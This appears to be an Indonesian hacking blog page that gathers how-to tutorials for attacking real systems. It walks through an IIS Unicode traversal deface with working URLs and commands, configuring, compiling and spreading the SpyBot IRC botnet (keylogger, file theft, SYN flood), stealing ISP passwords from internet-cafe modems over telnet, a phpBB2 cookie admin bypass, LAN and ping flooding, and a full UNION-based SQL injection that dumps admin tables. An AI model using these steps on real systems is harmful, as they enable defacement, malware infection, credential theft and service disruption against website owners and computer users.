♺ Google is the best teacher ♺ | University of Gunadarma IT ☺

Langkah Sederhana Buat Deface

Langkah 1 : Mencari target

Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

Langkah 2 : Unicode


Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

http://target/_vti_bin/..%c0%af../.....exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%...exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0...exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%...exe?/c+dir+c:\
http://target/scripts/..%255c..%255c...exe?/c+dir+c:\

Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT

Langkah 3 :Mencari halaman depan

Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

/c+dir/s+c:\index.htm

Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:

/c+copy+c:\

contoh untuk pencopyan adalah:

/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/



Langkah 4 : Meng-Copy file index.htm


echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\inde x.htm

sehingga tampilan site depan telah terganti dengan tulisan
deface was here


Code:
Catatan:

Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :

membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file
 

DDoS ( Distributed Denial Of Service ) With -SPYBOT~ + Cheat Rock Legend

APA DAN BAGAIMANA SERANGAN DDoS ITU ...?

Serangan yang paling menakutkan sampai detik ini masih tetap di pegang oleh DDoS.
Serangan ini pula yang memaksa gedung putih memindahkan server mereka setelah membuat marah hacker dari cina dan serangan yang membuat situs microsoft tidak bisa diakses. Anda bisa membayangkan betapa berbahayanya serangan tanpa obat seperti ini .

Hacker yang melancarkan serangan DDoS, haruslah mempunyai banyak komputer yang siap diperintah.
Komputer komputer ini dinamakan zombie. Hacker akan memerintahkan komputer zombie melalui perantara yang dinamakan sebagai master, disini kita akan menggunakan perantara(master) yaitu mIRC .

ketika sang hacker hendak melakukan serangan DDoS, ia hanya perlu masuk ke komputer yang bertindak sebagai MASTER ini. Kemudian memberikan perintah dari situ. Semua komputer zombie yang mendengarkan perintah dari tuannya akan segera melakukan serangan terhadap komputer korban yang di tentukan oleh hacker.


BAGAIMANA MENCARI ZOMBIE ?

Untuk melakukan serangan DDoS, syarat utamanya adalah memiliki pasuka Zombie sebanyak banyaknya. Semakin banyak seseorang memiliki komputer zombie, maka kekuatannya semakin besar dan dengan mudah ia bisa membuat situs manapun yang tidak mempunyai bandwidh yang sebanding dengan nya untuk down. Sebesar apapun bandwidh, pastilah ada batasnya dan ini adalah inti dari serangan DDoS.


ZOMBIE TIDAK HANYA UNTUK DDoS !

Seorang hacker yang memiliki banyak zombie, tidak hanya memanfaatkan pasukannya untuk melakukan serangan DDoS. Hackeer bisa melakukan banyak sekali ha-hal yang mengerikan dengan pasukannya, diantaranya adalah :

1. sebagai SPAMMER.
2. Pay Per Click ( PPC ).
3. Pencurian bandwidh dan space.

dan sekarang kita membahas cara membuat nya...


------------------------------------------SPYBOT----------------------------------------


Spybot merupakan salah satu bot yang terkenal di dunia Cyb3R atau Und3R Gr0unD dan sangat luas digunakan oleh para hacker. Bot ini dibuat dengan bahasa C oleh Mich yang sebelumnya disebarkan secara terbatas melalui situs nya .

Karena program ini berupa source code, Anda harus melakukan proses kompilasi yang sering menakutkan pengguna awam. Namun, Anda tidak perlu khawatir, pembuat program ini telah menyediakan sebuah batch file yang tinggal anda klik dana selesailah sudah.

Saya mendownload compiler gratis bahasa C seperti yang disarankan yaitu lcc-win32, program ini saya akan upload. Sangatlah mudah dan tidak ada yang perlu diceritakan lebih lanjut. Anda hanya perlu klik next,next,finish dan selesai.

File sumber SPYBOT terdiri atas file spybot.c yang merupakan source kod file sedangkan konfigurasi disimpan pada filee yang berbeda yaitu settings.h . Anda menetukan sifat dan karakterik file spybot yang hendak diciptakan melalui file settings.ini .

Sebagai contoh nya, saya mengambil beberapa baris pntig pada file settings.h

char password[] = "passwordanda"; //bots password
char channel[] = "#channelanda"; //channel bot joins on connect

pada baris password90 merupakan password untuk memerintah bot, tanpa mengetahui password ini, bot akan diam seribu bahasa ketika anda perintahkan melakukan sesuatu.

Secara deffault, password yang digunakan adalah "passwordanda" ....

Secara deffault channel tersebut diset dengan #channelanda .

mIRC mempunyai banyak sekali jaringan-jaringan yang berdiri sendiri. Misalnya, server-server dalam kelompok dalnet, tidak bisa berhubungan dengan server-server dalam kelompok undernet karena keduanya saling berdiri sendiri...

Karena itu, kita juga perlu menentukan server mana channel #channelanda akan dibuat. Bais yang menentukan hal ini berada pada baris berikut :

//servers

char *ircservers[]={
"127.0.0.1",
"irc.icq.com",
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
6667,
6666,

};


Secara deffault server yang akan digunakan dimasukkan kedalam array bernnama irservers yang secara deffault menggunakan 127.0.0. dan server irc.icq.com. Nomor port yang digunakan harus sesuai jumlahnya dengan server yang digunakan karena menggunakan dua server, terdapat dua port yang digunakan yaitu 6667 dan 6666.

jika anda hendak merubahnya ke server dalnet misalnya, Anda juga harus mengetahui port yang digunakan oleh server tersebut dan mengisinya pada baris serverports[].

Untuk mengetahui nama server dan juga nama port server mIRC, Anda bisa mendownload list server-server mIRC dari internet.
Saya menggunakan software mIRC dan dari situ juga bisa dilihat dengan mengklik tombol
Option>Connect>Servers>Pilih Server IRC>Edit.

terlihat server irc.icq.com termasuk dalam kategori group IrCQNet.
Pada contoh ini, Saya tidak akan merubah server yang digunakan dan hanya menghapus server lokal 127.0.0.1 karena memang tidak di perlukan. Code akhir setelah saya edit akan tampak seperti berikut..

char *ircservers[]={
"irc.icq.com",
NULL //dont remove this line
};

//number of ports MUST be the same as the number of servers you use,

int serverports[]={
7000,

};


Setelah proses konfigurasi selesai dilakukan, saatnya untuk melakukan kompilasi.
Klik file "Make spybot.bat" yang akan menghasilkan file spybot.exe. File inilah yang nantinya harus dijalankan di komputer korban.
anda dapat membuat autorun untuk menjalankan file ini secara otomatis di komputer korban..
dan tinggal anda pikirkan dan kembangkan sendiri supaya dapat menyebar luaskan file ini...

Berikut adalah fungsi menarik yang tersedia :
*ingat bahwa anda bisa mengganti printah default ini dengan kata lain sesuai dengan kehendak anda melalui file settings.h


Login password = untuk memerintahkan bot yang diberi password, Anda harus login terlebih dahulu dengan perintah ini

raw [raw command] = Mengirimkan perintah-perintah ke IRC. Anda bisa mempelajari perintah IRC untuk mengetahuinya lebih lanjut (contoh: raw PRIVMSG #spybot1.1:hello)

list [path+filter] = Melihat file, sama dengan perintah dir. (contoh list c:\*.*)

delete [filename] = menghapus file. (contoh : delete c:\windows\netstat.exe)

executa [filename] = Menjalankan file atau program. (contoh : execute c:\windows\system32\notepad.exe). program notepad akan di jalankan di komputer zombie.

rename [originalfile] [newfile] = Merubah nama file (contoh : rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)

makedir [dirname] = Membuat direktory (contoh : makedir c:\test\ )

startkeylogger = menjalankan keylogger di komputer zombie.

stop keylogger = mematikan keylogger di komputer zombie.

sendkeys [keys] = Mensimulasikan ketikan keyboard. Anda bisa mengirimkan ketikan keyboard dengan perintah ini. Sebagai contohnya, jika anda mengirimkan perintah "sendkeys zom-zom" maka tulisan
om-zom akan terkirim.
Saya tidak mengetahui kenapa huruf pertamanya hilang namun, anda bisa menceganya dengan menggunakan spasi di depan karakter yang hendak di kirim

keyboardlights = Menyalakan lampu keyboard sebanyak 50 kali ( tindakan iseng ).

info = memberikan informasi tentang komputer zombie.

listprocesses = melihat proses yang sedang berjalan di komputer zombie.

killprocess [processname] = mematikan proses(contoh : killprocess firefox.exe)

reconnect = memintah komputer zombi untuk disconnect dari server IRC dan melakukan koneksi kembali.

disconnect [sec.] = meminta komputer zombie untuk disconnect dari IRC dalam beberapa waktu tertentu.

quit = mematikan bot

reboot = reboot komputer zombie

cd-rom [0/1] = jika 0 maka akan menutup cd-rom, jika 1 maka akan membuka cd-rom.


httpserver [port] [root-dir] = menjalankan fungsu server web. (contoh : httpserver 80 C:\ ).dengan perintah ini anda bisa mem-browse ke alamat IP zombie dan melihat semua file yang ada di drive C dengan browser.

syn [host] [port] [delat msec.] [times] = melakukan serangan syn (contoh : syn 127.0.0.1 80 100 1000)

Threads = Menampilkan semua proses yang sedang di jalankan oleh bot.

killthread [number] = mematikan proses, number adalah nomor yang di dapatkan pada threads sebelumnya.

get [filename] = mengambil file yang ada di komputer zombie.

opencmd = menjalankan program cmd pada komputer zombie dalam modus tersembunyi..

cmd [command] = mengirim perintah . (sebelumnya harus menggunakan opencmd).

scan [start ip address] [port] [delay] [filename] = melakukan scanning (contoh :
scan 127.0.0.1 17300 1 portscan.txt

download [url] [filename] = mendownload file dari internet. (contoh : download http://127.0.0.0/server.exe c:\server.exe


uninstall = uninstall program bot dari komputer korban. Perintah ini akan membuat program bot tidak aktif lagi di komputer korban namun file bot nya sendiri tidak terhapus.

sudah cukup saya, capek ngetik nya,,,
ckckkckck...
mudah mudahan bermanfaat ....
--------------------------------------------------------------------------------------

untuk mendownload file" SPYBOT disini
I'am Here

sedangkan untuk mendownload lcc-win32
ke sini donk

dan bagi yang mau cheat rock legend,,,
disini
 

Cara dan Jenis Hacker Menyerang Situs.

Dalam dunia hacking (tepatnya cracking ding!?) dikenal beberapa jenis serangan terhadap
server. Berikut ini jenis-jenis serangan dasar yang dapat dikelompokkan dalam minimal 6
kelas, yaitu:

Intrusion

Pada jenis serangan ini seorang cracker (umumnya sudah level hacker) akan dapat
menggunakan sistem komputer server. Serangan ini lebih terfokus pada full access granted
dan tidak bertujuan merusak. Jenis serangan ini pula yg diterapkan oleh para hacker untuk
menguji keamanan sistem jaringan mereka. Dilakukan dalam beberapa tahap dan tidak dalam
skema kerja spesifik pada setiap serangannya (dijelaskan pada artikel lain).
Hacking is an Art!? =)

Denial of Services (DoS)

Penyerangan pada jenis DoS mengakibatkan layanan server mengalami stuck karena kebanjiran
request oleh mesin penyerang. Pada contoh kasus Distributed Denial of Services (DDoS)
misalnya; dengan menggunakan mesin-mesin zombie, sang penyerang akan melakukan packeting
request pada server secara serentak asimetris dan simultan sehingga buffer server akan
kelabakan menjawabnya!? Stuck/hung akan menimpa server. Jadi bukan server lagi namanya!?
(servicenya mati masak dibilang server? hehehe....)

Joyrider

Nah, ini namanya serangan iseng!? Karena kebanyakan baca novel-novel hacking dan gak bisa
belajar benar, isenglah jadinya nyoba-nyoba nyerang pake ilmu-ilmu instan super cepat
(istilahnya 'onani' dimesin orang). Atau dengan alasan pengen tau isinya mesin orang!? =).
Yang jelas serangan jenis ini rata-rata karena rasa ingin tau, tapi ada juga yang sampe
menyebabkan kerusakan atau kehilangan data.

Vandal

Jenis serangan spesialis pengrusak!? nothing else to explain mbah!? =)

Scorekeeper

Serangan yang bertujuan mencapai reputasi hasil cracking terbanyak. Biasanya hanya
berbentuk deface halaman web (index/nambah halaman) dengan memampangakan NickName dan
kelompok tertentu. Sebagian besar masih tidak perduli dengan isi mesin sasarannya =).
Saat ini jenis penyerang ini lebih dikenal dengan sebutan WannaBe/Script kiddies.

Spy

Tiga hurup saja. Jenis serangan untuk memperoleh data atau informasi rahasia dari mesin
target. Biasanya menyerang pada mesin-mesin dengan aplikasi database didalamnya. Kadang
kala suatu perusahaan menyewa 'mata-mata' untuk mencuri data perusahaan rivalnya


1. IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.

2. FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem.


3. Unix Finger Exploits


Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.

Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.


4. Flooding & Broadcasting


Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

5. Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.


6. E-mail Exploits


Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

7. DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).

8. Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.


9.Proxy Server Attacks


Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.


10. Remote Command Processing Attacks


Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.


13. Port Scanning


Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception


TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.
 

hack uname & pwd speedy

-> bagaimana kita bisa mengetahui pwd speedy beserta usernamenya ?

-> untuk seklias kita bisa kunjungi warnet" yang memakai ISP speedy.

-> ketika kita sedang berada dalam lingkungan warnetnya, masuklah ke dalam modemnya, kita bisa memakai default password , atau kalian tinggal jelajah di situs ini http://www.phenoelit-us.org/dpl/dpl.html

-> ok ketika kita berhasil memasuki isi dari modem , nah disana jika kita akan ambil password , pasti dia mendecryptsi kan password nya dengan bentuk asterik , maka kita di anjurkan untuk membuka sesi telnet .

-> open telnet, ex

telnet 192.168.1.1
login > admin
password > password

-> setelah itu ketikan show all
nah disitu tinggal copas aja semua isinya

contoh :




dengan begitu kita sudah dapat memegang password speedy ,.


hal ini adalah kesalahan dari vendor" modem tertentu ,
dimana jika kita melakukan password recovery speedy , mereka hanya bisa menyebutkan 3 angka terakhir , nah dengan inilah cara untuk mendapatkan password kita
 

Deface for Newbie

Langkah-Langkah Deface PHPBB/PHPBB2 Loser_cs_20
1. Buka browser Mozilla FireFox

2. Download pluginnya yg bernama LiveHTTPHeader
download di http://livehttpheaders.mozdev.org/installation.html
cari yg paling baru

3. selanjutnya cari target dengan Uncle Google dgn syntax :
phpBB site:[terserah apa aja]

4. setelah itu buka plugin yg kita download tadi di Tools -> LiveHTTPHeader

5. Ingat, isi LiveHTTPHeader harus kosong

6. buka situs target, dengan begitu LiveHTTPHeader akan mengambil semua cookie yg tercatat di halaman target

7. setelah halaman sukses terbuka ditandai dengan tanda "done" di bawah browser, langkah selanjutnya adalah mengklik LiveHTTPHeader di bagian tengahnya dilanjutkan mengklik opsi Replay..

8. setelah LiveHTTPReplay terbuka liat bagian seperti dibawah ini pada LiveHTTPReplay...

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

9. Hapus bagian yg belakang setelah tanda semi colon (

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; phpbb2mysql_sid=88da2bbdc1a3a789df094d50d91f7e3b

\_______________hapus bagian ini_________________/

jadinya akan seperti ini :

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D

10. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi

11. selanjutnya perhatikan langkah di bawah ini:

Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D
\________hapus bagian ini dan di ganti dengan:

Cookie: phpbb2mysql_data=a:2{s:11:"autologinid";s:32:"602b aahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2" ;}

12. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

13. perhatikan lagi langkah ini:

Cookie: phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"602 baahpepms74d4cb6f2d012e1e4019";s:6:"userid";s:1:"2 ";}
\___________________________bagian ini jg digantilagi_______________________________/

menjadi seperti ini:

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222 %22%3B%7D

14. lalu klik replay lagi, sehingga halaman target akan mereload semua perintah cookie yg telah kita manipulasi tadi.

15. selesai, silakan liat halaman target, kalo anda beruntung anda mendapatkan full admin.
Silakan pergi ke bawah halaman dan lihat opsi "Go To Administration Panel" telah muncul

mohon maaf y kk master klu ada yang salah maklum
 

Nembak IP dari Jauh ! DDOS

Banyak org setelah kehabisan akal fikiran untuk membobol suatu web tetapi dia tak bisa masuk k dlm system itu
ahkirnya dya melakukan DDOS T_T

di sini saya akan share sedikit apa yang saya ketahui mumpung koneksi lagi lumayan ngacir and udh ga sabar buat nntn comfrog

okey kita mulai

pertama2
1 matikan antivirus T_T
2.download
WinArpattaker di sini Klik download

ketiga ayo kita mulai tutor nya

cara 1 [ dari dalam ]

Ini yang dinamakan dengan Lan Flood , ok ga usah banyak komentar langusng aja step by step, Perhatian artikel ini hanya sebagai wujud pembelajaran untuk kita semua tidak bertujuan untuk merusak, sebab akan fatal bila disalahgunakan bisa menyebabkan kartu Lan rusak ,
BtW, let's go
pasang software WIncap, setelah dipsang/install jalankan WinArpattaker








Lihat akan terlihat IP dari LAN secara otomatis, penulis akan coba salah satu IP tersebut penulis akan mencoba IP 192.168.0.2 atas nama RIZKA, centang kotak disamping IP tersebut









Masuk ke OPTION sett berapa yang mau kita pergunakan , penulis coba set semaksimal mungkin, klik appl,ok kembali ke menu utama klik ATTACK pilih FLOOD, tunggu beberapa menit maka akan nampak hasilnya














atau bisa jga pake cara lama dengan cara ini (cara buat dos web target )

(bagi pengguna windows)

klik start >> run >> cmd >> kemudian ketikan ini ping -t www.situstarget.com tunggu aja dan ulangin sampai sebanyak2nya maka itu akan rontok deh ^_^
---------------------------------------------------------------


udh deh ... selesai nah skrg ak lagi bikin tools online nya buat dos target / ip nanti kalo udh jd ak share ^^
di tunggu aja

================================================== =
special credit : sekuritionline
__________________
 

Tutorial Sql Injection

Dorks Google : inurl:.php?=

Petama :
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.
contoh:
/news.php?id=-100 atau /news.php?id=2'

Kedua:
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : +order+by+

contoh:
[site]/news.php?id=2+order+by+1 --

sekarang cek secara satu per satu
contoh:
/news.php?id=2+order+by+1 --
/news.php?id=2+order+by+2 --
/news.php?id=2+order+by+3 --
/news.php?id=2+order+by+4 --

sehingga muncul error atau hilang pesan error...
misal:
/news.php?id=2+order+by+5 --

berarti yang kita ambil adalah sampai angka 4
menjadi
/news.php?=id=100+union+select+4--


Ketiga
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 5
maka:
/news.php?=id=100+order+by+4--

Ok ,yangg keluar angka 2
gunakan perintah version() untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
contoh:
/news.php?=id=100+union+select+1,version(),3,4--

lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema


Keempat
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir

contoh:
[/news.php?=id=100+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

seumpama yg kita cari adalah "admin"


Kelima
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir

/news.php?=id=100+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0xhexa--

pada tahap ini kalian wajib menconvert kata pada isi table menjadi hexadecimal.
website yg digunakan untuk konversi :

http://tools.vyc0d.com/converter/

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646d696e

/news.php?=id=100+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x61646d696e--


Keenam
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir

/news.php?=id=100+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--

